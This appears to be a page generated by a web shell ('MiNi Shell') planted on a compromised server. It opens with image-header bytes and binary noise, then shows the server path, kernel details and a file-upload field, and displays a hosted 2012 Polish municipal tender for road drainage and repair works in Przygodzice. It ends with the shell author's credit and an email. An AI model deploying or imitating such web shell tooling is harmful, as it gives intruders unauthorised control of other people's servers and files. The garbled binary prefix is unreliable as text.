JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120426/94459-N-2012.html

<p class="kh_header"><b>Przygodzice: Bieżące remonty dróg gminnych w 2012 r. 
1. Odwodnienie drogi w m. Ludwików - naprawa przepustu
2. Odwodnienie drogi w m. Przygodzice ul. Nowe Osiedle
3. Odwodnienie drogi w m. Wysocko Małe ul. Chynowska
4. Odwodnienie drogi w m. Przygodzice ul. PTR
5. Remont drogi w m. Chynowa - etap III
6. Remont drogi w m. Chynowa - Zapłocie
7. Remont drogi w m. Czarnylas
8. Remont drogi w m. Topola-Osiedle ul. Poprzeczna
9. Remont pobocza drogi Dębnica -Trzcieliny
10. Odwodnienie drogi w m. Przygodzice ul. Topolowa
11. Remont drogi w m. Dębnica ul. Stawowa</b><br>
<b>Numer ogłoszenia: 94459 - 2012; data zamieszczenia: 26.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Przygodzice , Plac Powstańców Wielkopolskich 2, 63-421 Przygodzice, woj. wielkopolskie, tel. 062 5927722, faks 062 5927000.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przygodzice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące remonty dróg gminnych w 2012 r. 
1. Odwodnienie drogi w m. Ludwików - naprawa przepustu
2. Odwodnienie drogi w m. Przygodzice ul. Nowe Osiedle
3. Odwodnienie drogi w m. Wysocko Małe ul. Chynowska
4. Odwodnienie drogi w m. Przygodzice ul. PTR
5. Remont drogi w m. Chynowa - etap III
6. Remont drogi w m. Chynowa - Zapłocie
7. Remont drogi w m. Czarnylas
8. Remont drogi w m. Topola-Osiedle ul. Poprzeczna
9. Remont pobocza drogi Dębnica -Trzcieliny
10. Odwodnienie drogi w m. Przygodzice ul. Topolowa
11. Remont drogi w m. Dębnica ul. Stawowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje wykonanie następujących zadań:
1. Odwodnienie drogi w m. Ludwików - naprawa przepustu, naprawa szczelności rur poprzez:
- odkopanie naziomu nad przepustem oraz wypełnienia gruntu między rurami,
- uszczelnienie styków rur zaprawą atlas i wykonanie izolacji paskami papy asfaltowej termozgrzewalnej,
- wypełnienie przestrzeni między rurami chudym betonem C-5/6 z zagęszczeniem warstwami przy użyciu wibratora wgłębnego oraz wykonanie płaszcza nad rurami grubości 20cm,
- naprawa ubytków betonu w głowicach przepustu, naprawa pęknięć zaprawami i zaszpachlowanie całej powierzchni betonu głowicy przepustu,
- zasypanie gruntem z wykopu całej przestrzeni wykopu wraz z zagęszczeniem.
Roboty wykonać przy niskim poziomie wód w rz. Dąbrówce.
2. Odwodnienie drogi w m. Przygodzice ul. Nowe Osiedle
- odcinek do ul. Słowackiego z przerwami na zjazdy i skrzyżowania, gdzie są ułożone rury na długości łącznej 150mb.
- w rowie przydrożnym po stronie lewej należy ułożyć koryta odwadniające o wym. 75x68x60 (dł./szer./wys.) 
- ścieki należy układać po wyprofilowaniu dna i skarp rowu na podsypce cementowo- piaskowej gr. 10cm.
- grunt z wykopu do podsypania na skarpach lub do wywiezienia.
3. Odwodnienie drogi w m. Wysocko Małe ul. Chynowska 
- ściek prefabrykowany 128mb po stronie prawej w kierunku końca zabudowy. 
- ściek prefabrykowany 60x15 lub 50x15 na ławie z betonu B-10 grubości 15cm.
W ramach robót ziemnych należy wyprofilować pobocze i skarpę w stronę ogrodzeń a na wjazdach należy uszczelnić połączenie ścieku prefabrykowanego i nawierzchnię z kostki betonowej.
4. Odwodnienie drogi w m. Przygodzice ul. PTR
W celu ujęcia wody w obrębie jezdni należy wykonać:
- regulację krawężnika istniejącego na wysokość 12cm na jezdnię wraz z uzupełnieniem ławy betonowej
- ustawienie krawężnika betonowego nowego na ławie z oporem na wjazdach na wysokość 4cm nad jezdnię,
- przełożenie nawierzchni z trylinki na wjeździe do poziomu krawężnika z uzupełnieniem podsypki piaskowej,
- uzupełnienie kruszywa na wjeździe na parking placu nauki jazdy,
- wykonanie studzienki ściekowej z osadnikiem i podłączenie do studni rewizyjnej na pasie zieleni.
5. Remont drogi w m. Chynowa - etap III
Na odcinku drogi o długości 500mb należy wykonać:
- profilowanie istniejącego podłoża na powierzchni 1500m2 z przemieszczeniem gruntu likwidując nierówności i zadolenia i nadanie pochylenia poprzecznego w kierunku rowu,
- wykonanie warstwy odsączającej gr. 10cm z piasku o kapilarności >8m/d,
- wykonanie podbudowy z kruszywa mieszkanki 0/63 (melafir) gr. 10cm,
- ułożenie kruszywa (melafir) o grubości 5 cm na powierzchni 1500m2 na odcinku wykonanym w ramach etapu II - warstwa kruszywa łamanego stabilizowanego mechanicznie melafir mieszanka 0/31,5 o grubości 5cm,
Pochylenie poprzeczne warstwy podbudowy winno wynosić 3% jednostronne, skierowane do rowu.
6. Remont drogi w m. Chynowa - Zapłocie
Remont odcinka drogi o długości odcinka 250mb, lokalizację wskaże upoważniony przedstawiciel Zamawiającego.
Profil drogi bardzo zdeformowany wymaga wykonania przesunięć gruntu w przekroju podłużnym podczas profilowania i wykonania warstwy odsączającej grubości min. 10cm z piasku na powierzchni 750m2 i wykonania warstwy podbudowy z kruszywa pokolejowego odsiewki lub gruzu betonowego ewentualnie z kruszywa łamanego mieszkanki 0/63 ze skał twardych (melafir) o grubości 10cm na powierzchni 750m2
Pochylenie poprzeczne podbudowy z kruszywa winno wynosić 3%.
7. Remont drogi w m. Czarnylas
Remont odcinka drogi na długości 100mb, lokalizację wskaże upoważniony przedstawiciel Zamawiającego.
Profil drogi bardzo zdeformowany wymaga wykonania przesunięć gruntu w przekroju podłużnym podczas profilowania i wykonanie warstwy podbudowy z kruszywa łamanego mieszanki 0/63 ze skał twardych (melafir) o grubości 10 cm na powierzchni 300m2
Pochylenie poprzeczne podbudowy z kruszywa winno wynosić 3%.
8.Remont drogi w m. Topola-Osiedle ul. Poprzeczna
Remont odcinka drogi na długości 100mb, lokalizację wskaże upoważniony przedstawiciel Zamawiającego.
Zakres robót wymaga wykonania:
- roboty ziemne z wywozem gruntu. Niweletę drogi dowiązać się do poziomu skrzyżowania i istniejącej infrastruktury,
- profilowanie podłoża wraz z zagęszczeniem na powierzchni 300m2
- wykonanie warstwy odsączającej grubości min 10cm z piasku na powierzchni 300m2 i wykonanie warstwy podbudowy z kruszywa pokolejowego odsiewki lub gruzu betonowego ewentualnie z kruszywa łamanego mieszanki 0/63 ze skał twardych (melafir) o grubości 10cm na powierzchni 300m2
Pochylenie poprzeczne podbudowy z kruszywa winno wynosić 3%.
9. Remont pobocza drogi Dębnica -Trzcieliny
Uzupełnienie pobocza na długości 200mb obejmuje wykonanie:
- koryto wraz z zagęszczeniem na głębokość 10cm i szerokość 0,7m
- wykonanie podbudowy z kruszywa pokolejowego lub mieszanki 0/63 (melafir) na powierzchni 140m2
10. Odwodnienie drogi w m. Przygodzice ul. Topolowa
- ściek prefabrykowany na długości 50mb, lokalizację wskaże upoważniony przedstawiciel Zamawiającego,
- ściek prefabrykowany 60x15 lub 50x15 na ławie z betonu B-10 grubości 15cm
W ramach robót ziemnych należy wyprofilować pobocze i skarpę w stronę ogrodzeń a na wjazdach należy uszczelnić połączenie ścieku prefabrykowanego i nawierzchnię zjazdów.
11. Remont drogi w m. Dębnica ul. Stawowa
Remont odcinka drogi o długości 400mb, w ramach którego należy wykonać:
- profilowanie istniejącego podłoża na powierzchni  1500m2 z przemieszczeniem gruntu likwidując nierówności i zadolenia i nadanie pochylenia poprzecznego,
- wykonanie warstwy odsączającej gr. 10cm z piasku o kapilarności >8m/d
- wykonanie podbudowy z kruszywa pokolejowego, gruzu betonowego zaklinowanego żużlem paleniskowym lub z mieszanki 0/63 (melafir) gr. 10cm.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 3.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowane wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech robót polegających na wykonaniu remontu lub przebudowy drogi (podbudowa) oraz jednej roboty polegającej na odwodnieniu drogi. Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowane dysponowanie, w celu realizacji zamówienia, następującymi narzędziami i urządzeniami technicznymi, wraz z informacją o podstawie dysponowania tymi zasobami:
- koparko-spycharka na podwoziu ciągnika kołowego - szt. 1
- równiarka samojezdna - szt. 1
- walec wibracyjny ogumiony 15t lub walec statyczny samojezdny 15t - 1 szt.
- samochód samowyładowczy 5-10t - szt. 1
- wibrator powierzchniowy - szt. 1
- ubijak spalinowy - szt. 1;
Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia na podstawie treści złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 100.000,00 zł. Ocena spełniania ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony FORMULARZ OFERTY
2. Opracowany kosztorys ofertowy
3. Dowód wniesienia wadium
4. Pełnomocnictwo - oryginał lub kopia potwierdzona notarialnie
- w przypadku podpisania oferty lub poświadczenia za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym, (ewidencyjnym) Wykonawcy
5. Dotyczy podmiotów występujących wspólnie:
1. Następujące dokumenty i oświadczenia składa każdy z członków konsorcjum w imieniu własnym: 
- oświadczenie o braku podstaw do wykluczenia z postępowania, 
- odpis z właściwego rejestru a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy,
- dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone
2. Ponadto wymagane są następujące dokumenty: 
- dokument ustanawiający pełnomocnika, 
- upoważnienie pełnomocnika do reprezentowania grupy wykonawców w postępowaniu o udzielenie zamówienia lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w ich imieniu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana terminu realizacji przedmiotu zamówienia, w przypadku zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie prac lub spełnienie wymogów technologicznych, udokumentowanych - o czas trwania niesprzyjających warunków atmosferycznych,
- rezygnacja z wykonania części robót budowlanych,
- wykonanie robót zamiennych,
- wystąpienie w trakcie realizacji zamówienia robót, których nie można było wcześniej przewidzieć</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.przygodzice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Przygodzice, Plac Powstańców Wlkp.2, 63-421 Przygodzice, I piętro, pok. nr 16. Na wniosek Wykonawca może odebrać SIWZ osobiście lub za zaliczeniem pocztowym, opłata za SIWZ wynosi 18,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2012 godzina 10:00, miejsce: Gmina Przygodzice - Urząd Gminy, Plac Powstańców Wlkp. 2, 63-421 Przygodzice, pok. nr 1 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione przez Zamawiającego do porozumiewania się z Wykonawcami :
- w sprawach procedury przetargowej : mgr Lucyna Koczorowska - Kierownik Referatu Rozwoju Gospodarczego w Urzędzie Gminy w Przygodzicach, tel. 62 5927722 wew. 123, 
- w sprawach dotyczących przedmiotu zamówienia : Hieronim Graf, Urząd Gminy w Przygodzicach, tel. 62 5927722 wew. 144.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com